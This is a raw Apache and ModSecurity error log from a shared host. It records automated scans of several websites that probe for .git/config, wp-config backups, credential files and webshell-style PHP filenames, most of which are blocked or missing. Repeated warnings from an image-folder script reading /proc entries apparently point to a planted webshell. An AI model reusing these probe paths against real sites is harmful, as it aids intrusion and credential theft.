[Tue May 12 01:34:54.275999 2026] [security2:error] [pid 1691274:tid 1691278] [client 77.83.39.94:53950] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agJnnlfdQaraX_prmqcK2wAAAAE"]
[Tue May 12 01:34:54.276235 2026] [security2:error] [pid 1691274:tid 1691278] [client 77.83.39.94:53950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agJnnlfdQaraX_prmqcK2wAAAAE"]
[Tue May 12 01:34:54.276465 2026] [security2:error] [pid 1691274:tid 1691278] [client 77.83.39.94:53950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agJnnlfdQaraX_prmqcK2wAAAAE"]
[Tue May 12 01:34:55.911455 2026] [security2:error] [pid 1709071:tid 1709090] [client 43.161.217.205:40610] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/la-restauration/"] [unique_id "agJnn7vMumyrWMfSu7qUnQAAAMM"]
PHP Warning:  filesize(): stat failed for /proc/1704738/task/1704738/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704738/task/1704738/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704738/task/1704738/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704738/task/1704738/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704738/task/1704738/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704738/task/1704738/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:35:06.672925 2026] [:error] [pid 1691274:tid 1691288] [client 45.205.1.73:44820] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:35:29.185884 2026] [security2:error] [pid 1695975:tid 1695988] [client 43.134.92.251:35712] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJnwdVI9ymHBxup7495RAAAAIo"]
[Tue May 12 01:35:31.633897 2026] [security2:error] [pid 1707624:tid 1707690] [client 43.134.92.251:50526] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJnw7OxS7i6i_mT2NK02wAAAEg"], referer: http://www.pole-de-mobilite-regional.com
[Tue May 12 01:35:35.797458 2026] [security2:error] [pid 1709071:tid 1709110] [client 43.134.92.251:57616] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJnx7vMumyrWMfSu7qU1AAAANc"], referer: https://www.pole-de-mobilite-regional.com/
[Tue May 12 01:36:43.798245 2026] [security2:error] [pid 1691274:tid 1691291] [client 43.157.20.63:51738] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/2023/08/"] [unique_id "agJoC1fdQaraX_prmqcLeAAAAA8"]
[Tue May 12 01:36:52.213880 2026] [security2:error] [pid 1691274:tid 1691285] [client 43.153.10.13:57424] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/domotique/hal-9000/"] [unique_id "agJoFFfdQaraX_prmqcLfQAAAAg"]
PHP Warning:  filesize(): stat failed for /proc/57/task/57/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/57/task/57/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/57/task/57/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/57/task/57/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/57/task/57/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/57/task/57/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:37:37.356108 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/moon.php
[Tue May 12 01:37:37.559394 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/a1.php
[Tue May 12 01:37:37.757610 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/ahax.php
[Tue May 12 01:37:37.945362 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/lite.php
[Tue May 12 01:37:38.154081 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/k.php
[Tue May 12 01:37:38.404521 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/leaf.php
[Tue May 12 01:37:38.614291 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/wp-conflg.php
[Tue May 12 01:37:38.801343 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/wp_filemanager.php
[Tue May 12 01:37:39.030473 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/pp.php
[Tue May 12 01:37:39.260349 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/index26.php
[Tue May 12 01:37:39.446220 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/12.php
[Tue May 12 01:37:39.835154 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/Marvins.php
[Tue May 12 01:37:40.021696 2026] [security2:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/wp-config.php.backup"] [unique_id "agJoRLOxS7i6i_mT2NK1mAAAAFE"]
[Tue May 12 01:37:40.021845 2026] [security2:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/wp-config.php.backup"] [unique_id "agJoRLOxS7i6i_mT2NK1mAAAAFE"]
[Tue May 12 01:37:40.022096 2026] [security2:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/wp-config.php.backup"] [unique_id "agJoRLOxS7i6i_mT2NK1mAAAAFE"]
[Tue May 12 01:37:40.228204 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/aa.php
[Tue May 12 01:37:40.678095 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/abcd.php
[Tue May 12 01:37:40.869972 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/a2.php
[Tue May 12 01:37:41.060412 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/wp-gr.php
[Tue May 12 01:37:41.268484 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/xynz1.php
[Tue May 12 01:37:41.467879 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/uqcxit7i.php
[Tue May 12 01:37:41.659343 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/display_info.php
[Tue May 12 01:37:41.859366 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/wp-config-disabled.php
[Tue May 12 01:37:42.048378 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/test_info.php
[Tue May 12 01:37:42.244515 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/spip.php
[Tue May 12 01:37:42.468160 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/wp-index.php
[Tue May 12 01:37:42.697275 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/php-nginx.php
[Tue May 12 01:37:43.181897 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/wp-config.test.php
[Tue May 12 01:37:43.408105 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/op.php
[Tue May 12 01:37:44.023690 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/mandrill.php
[Tue May 12 01:37:44.238189 2026] [security2:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/backup.wp-config.php"] [unique_id "agJoSLOxS7i6i_mT2NK1twAAAFE"]
[Tue May 12 01:37:44.238416 2026] [security2:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/backup.wp-config.php"] [unique_id "agJoSLOxS7i6i_mT2NK1twAAAFE"]
[Tue May 12 01:37:44.238700 2026] [security2:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/backup.wp-config.php"] [unique_id "agJoSLOxS7i6i_mT2NK1twAAAFE"]
[Tue May 12 01:37:44.423723 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/20.php
[Tue May 12 01:37:44.642690 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/upload_file.php
[Tue May 12 01:37:46.409806 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/aws.settings.php
[Tue May 12 01:37:46.607209 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/payout.php
[Tue May 12 01:37:46.817043 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/pqr.php
[Tue May 12 01:37:47.016886 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/phpinfo.php
[Tue May 12 01:37:47.213817 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/tmp.php
[Tue May 12 01:37:48.112048 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/456.php
[Tue May 12 01:37:49.760209 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/new2.php
[Tue May 12 01:37:49.978019 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/server.php
[Tue May 12 01:37:50.195857 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/extension-info.php
[Tue May 12 01:37:50.416067 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/conn_test.php
[Tue May 12 01:37:50.632147 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/information.php
[Tue May 12 01:37:50.831609 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/credentials.php
[Tue May 12 01:37:51.059270 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/phphph.php
[Tue May 12 01:37:52.075935 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/test-cgi.php
[Tue May 12 01:37:52.289079 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/twin.php
[Tue May 12 01:37:52.480317 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/pi.php7
[Tue May 12 01:37:52.700472 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/display_phpinfo.php
[Tue May 12 01:37:52.926648 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/webserver-info.php
[Tue May 12 01:37:53.137333 2026] [security2:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/new-wp-config.php"] [unique_id "agJoUbOxS7i6i_mT2NK10gAAAFE"]
[Tue May 12 01:37:53.137489 2026] [security2:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/new-wp-config.php"] [unique_id "agJoUbOxS7i6i_mT2NK10gAAAFE"]
[Tue May 12 01:37:53.137753 2026] [security2:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/new-wp-config.php"] [unique_id "agJoUbOxS7i6i_mT2NK10gAAAFE"]
[Tue May 12 01:37:54.227479 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/env-info.php
[Tue May 12 01:37:54.436155 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/moderator.php
[Tue May 12 01:37:55.002477 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/23.php
[Tue May 12 01:37:55.218374 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/summary.php
[Tue May 12 01:37:55.459895 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/globals.php
[Tue May 12 01:37:55.695470 2026] [:error] [pid 1707624:tid 1707699] [client 20.220.233.65:20829] File does not exist: /home/apoefr/public_html/evil.php
[Tue May 12 01:38:12.262762 2026] [security2:error] [pid 1630927:tid 1630953] [client 34.39.6.65:36938] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.com.manhattan-studio.fr"] [uri "/.git/config"] [unique_id "agJoZGiGYYhUwDaJINnSvwAAAVc"]
[Tue May 12 01:38:12.262994 2026] [security2:error] [pid 1630927:tid 1630953] [client 34.39.6.65:36938] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.com.manhattan-studio.fr"] [uri "/.git/config"] [unique_id "agJoZGiGYYhUwDaJINnSvwAAAVc"]
[Tue May 12 01:38:12.263264 2026] [security2:error] [pid 1630927:tid 1630953] [client 34.39.6.65:36938] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.com.manhattan-studio.fr"] [uri "/.git/config"] [unique_id "agJoZGiGYYhUwDaJINnSvwAAAVc"]
[Tue May 12 01:38:22.213838 2026] [security2:error] [pid 1709071:tid 1709089] [client 20.220.233.65:51460] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxparentbebe.happy-baby-box.fr"] [uri "/wp-config.php.backup"] [unique_id "agJobrvMumyrWMfSu7qWDgAAAMI"]
[Tue May 12 01:38:22.214176 2026] [security2:error] [pid 1709071:tid 1709089] [client 20.220.233.65:51460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxparentbebe.happy-baby-box.fr"] [uri "/wp-config.php.backup"] [unique_id "agJobrvMumyrWMfSu7qWDgAAAMI"]
[Tue May 12 01:38:22.214392 2026] [security2:error] [pid 1709071:tid 1709089] [client 20.220.233.65:51460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxparentbebe.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJobrvMumyrWMfSu7qWDgAAAMI"]
[Tue May 12 01:38:28.431520 2026] [security2:error] [pid 1709071:tid 1709089] [client 20.220.233.65:51460] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxparentbebe.happy-baby-box.fr"] [uri "/backup.wp-config.php"] [unique_id "agJodLvMumyrWMfSu7qWMAAAAMI"]
